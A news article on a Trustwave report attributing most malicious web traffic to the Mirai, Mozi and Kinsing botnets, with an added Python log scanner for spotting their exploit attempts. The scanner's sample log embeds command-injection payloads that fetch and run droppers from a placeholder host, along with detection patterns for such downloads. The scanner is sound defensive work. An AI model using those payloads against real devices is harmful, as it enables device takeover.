Almost all malicious traffic on the wider internet comes from botnets, according to a new research report published by cybersecurity researchers at Trustwave.
In their report, Trustwave’s experts wrote that after analyzing “vast amounts” of data from more than 38,000 unique IP addresses, and after obtaining 1,100 unique payloads served in attacks, they found that almost 19% of all recorded web traffic was malicious.
Botnets were responsible for more than 95% of the malicious traffic recorded in that period. The analysis covered six months ending in May this year.
While there are probably dozens, if not hundreds, of different botnets in operation, only a handful stood out as the most active. Mirai, Mozi, and Kinsing together accounted for almost all (95%) of the recorded exploit attempts sent over HTTP or HTTPS. These malware families, the researchers explained, are the most widespread, and their main objective is to exploit vulnerabilities in Internet of Things (IoT) devices in order to compromise them and assimilate them into the botnet.
The botnets also deploy web shells when exploiting vulnerabilities in specific enterprise applications, the researchers concluded. Those flaws give them a foothold on the target endpoint, from which they can carry out further malicious actions. To stay safe, businesses must prioritize “robust security measures”, the researchers argue, including regularly applying patches, implementing strong access controls, assessing network security frequently, and monitoring network traffic for anything suspicious.
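The report's advice to watch network traffic is easier to act on with a concrete shape in mind. IoT-botnet exploit attempts over HTTP typically look like a command injection whose payload fetches a dropper with wget, curl or a busybox applet and runs it from a world-writable directory. The following Python scanner, added here as an illustration and not code from Trustwave or from the article, applies that heuristic to web-server access logs. The log lines, hosts, paths and file names in it are all constructed for the example (the addresses come from the documentation ranges), and the indicator patterns are generic shapes, not signatures taken from the report.

```python
"""Flag web requests that look like IoT-botnet exploit attempts in an access log."""
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed sample in Apache/nginx "combined" log format (not from the Trustwave
# report). The request targets imitate the shape of botnet exploit attempts, a
# command injection whose payload fetches and runs a dropper, but every host, path
# and file name below is made up for illustration. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2023:10:01:22 +0000] "GET /cgi-bin/ping.cgi?ip=127.0.0.1;wget+http://198.51.100.9/bins/x86;chmod+777+x86;./x86 HTTP/1.1" 404 162 "-" "-"
203.0.113.8 - - [12/May/2023:10:01:23 +0000] "POST /api/diag/ping?host=127.0.0.1;cd+/tmp%3Bcurl+-O+http://198.51.100.9/dropper.sh%3Bsh+/tmp/dropper.sh HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.44 - - [12/May/2023:10:02:01 +0000] "GET /index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.11 - - [12/May/2023:10:02:05 +0000] "GET /?q=%3Bbusybox%20wget%20http%3A%2F%2F198.51.100.9%2Fkinsing%20-O%20%2Ftmp%2Fkinsing%3B%2Ftmp%2Fkinsing HTTP/1.0" 400 0 "-" "-"
203.0.113.10 - - [12/May/2023:10:03:11 +0000] "POST /wp-login.php HTTP/1.1" 200 2100 "-" "curl/7.68.0"
203.0.113.13 - - [12/May/2023:10:03:40 +0000] "GET /search?q=a;b&page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
this line is not in combined format and is skipped
203.0.113.12 - - [12/May/2023:10:04:00 +0000] "GET /?x=%253Bwget%2Bhttp%253A%252F%252F198.51.100.9%252Fa.sh%253Bsh%2Ba.sh HTTP/1.1" 400 0 "-" "-"
"""

# Apache/nginx combined log format: src ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Generic indicators of the "fetch a dropper and run it" pattern; illustrative, not a signature set.
INDICATORS = {
    # fetch tools used to pull a payload onto the device
    "download_tool": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b", re.I),
    # shell metacharacters that chain an injected command onto the original one
    "shell_separator": re.compile(r"[;|&`]|\$\("),
    # running, or marking executable, something written to a world-writable directory
    "tmp_exec": re.compile(r"(?:^|[;&|\s])(?:sh|bash|chmod\s+\+?x)\s+(?:/tmp|/var/tmp|/dev/shm)/", re.I),
    # busybox applets are how payloads call tools on stripped-down firmware
    "busybox": re.compile(r"\bbusybox\b", re.I),
}


def normalize(target: str, max_rounds: int = 3) -> str:
    """Percent-decode the request target repeatedly so double-encoded payloads become visible."""
    current = target
    for _ in range(max_rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def classify(target: str) -> List[str]:
    """Return the names of the indicators present in the decoded request target."""
    decoded = normalize(target)
    return [name for name, pattern in INDICATORS.items() if pattern.search(decoded)]


def is_exploit_attempt(indicators: List[str]) -> bool:
    """A separator alone is normal ('&' joins query parameters); require it together with a
    download-and-run indicator so ordinary requests stay out of the alerts."""
    return "shell_separator" in indicators and any(
        name in indicators for name in ("download_tool", "tmp_exec", "busybox")
    )


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its fields, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def scan(log_text: str) -> List[dict]:
    """Return one finding per request that looks like a dropper-fetching exploit attempt."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format; a real pipeline would count these separately
        hits = classify(entry["target"])
        if is_exploit_attempt(hits):
            findings.append({
                "src": entry["src"],
                "ts": entry["ts"],
                "method": entry["method"],
                "target": entry["target"],
                "decoded": normalize(entry["target"]),
                "indicators": hits,
            })
    return findings


def summarize(findings: List[dict]) -> Dict[str, int]:
    """Count how often each indicator fired across the findings."""
    return dict(Counter(name for f in findings for name in f["indicators"]))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['src']:15} {f['method']:4} {','.join(f['indicators']):45} {f['decoded']}")
    print(summarize(results))
```

Four of the eight constructed lines are flagged; the `wp-login.php` request with a curl user agent is not, because only the request target is inspected, and `/search?q=a;b&page=2` is not, because a separator on its own never triggers an alert. The double-encoded last line is caught only because `normalize` decodes until the string stops changing; a single `unquote_plus` would leave `%3B` in place and miss it.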
Analysis: Why does it matter?
Businesses, regardless of their size, location, or industry, have always been an attractive target for cybercriminals. Botnets are one of the most potent weapons in their arsenal, and understanding the threat, how the attackers operate and what their goals are, can help businesses prepare their defenses better and repel future, potentially harmful, attacks.
Botnets are a staple of every serious threat actor’s operation. They can be used for a wide variety of malicious activity, from Distributed Denial of Service (DDoS) attacks, to cryptocurrency mining, to credential theft and sensitive data exfiltration. By controlling thousands of internet-connected devices, from computers, laptops, and servers to smart home appliances, smart meters, and office equipment, threat actors can direct enormous volumes of traffic at a single target, saturating its connection and effectively rendering the service inaccessible.
They can also install cryptominers, also known as cryptojackers, on compromised devices. XMRig, an open-source Monero miner, is by far the most commonly abused. Such malware “mines” cryptocurrency using the device’s computing power, electricity, and internet bandwidth and sends the proceeds to attacker-controlled wallets, turning a profit for the attacker. The victims are left with slowed or unusable devices and an inflated energy bill.
One of the most notorious botnets out there is Mirai. First identified in 2016, Mirai has since grown into a true botnet powerhouse; in its 2022 analysis, HowToGeek put the botnet at more than 500,000 devices. The malware targets Linux-powered devices, which in practice mostly means IoT endpoints, and spreads primarily by logging in over Telnet with factory-default credentials, with later variants also exploiting known vulnerabilities.
A year after its discovery, in 2017, law enforcement agencies arrested two individuals who later pleaded guilty to developing and using Mirai: Paras Jha of Fanwood, N.J., who was 21 at the time, and Josiah White of Washington, Pennsylvania, who was 20. The arrests did not end the threat. Mirai’s source code had been published openly in late 2016, and other threat actors quickly adopted it, which is why Mirai remains a formidable threat even today.
What have others said about bot traffic?
In SC Media’s recent report, the proportion of human traffic was said to have fallen to its lowest level in eight years, a “worrying trend with no signs of stopping.” However, the same report also notes that not all bot traffic is bad: many bots are benign and allow the internet to function in the way most people are used to these days.
Still, over the last 12 months malicious bots have become significantly more sophisticated, especially with the arrival of new tools such as generative AI. “The more sophisticated these bots become, the more difficult they are to stop,” the report states, adding that businesses must act quickly and defend their environments properly. “As bot activity closes in on 50% of all internet traffic, security teams must make mitigating the potential impact of those bots a high priority. Those who fail to act are putting themselves, their customers, and their reputations at risk.”
German outlet B2B Cyber Security reports that Germany has it particularly bad: last year almost two-thirds of all internet traffic in the country, 68.6%, came from bots, up sharply from 39.6% the year before. Citing analysis from cybersecurity firm Imperva, the publication says the share of traffic generated by human users fell to 25.2%, down a lot from 57.4% in 2021.
Go deeper
If you want to read up on the latest on Mirai, make sure to check out this report. Also, if you’re interested in learning more about Distributed Denial of Service attacks and how to stay safe, read this. Here’s our in-depth guide on the best malware removal tools and the best antivirus programs out there.
- Check out our list of the best firewalls right now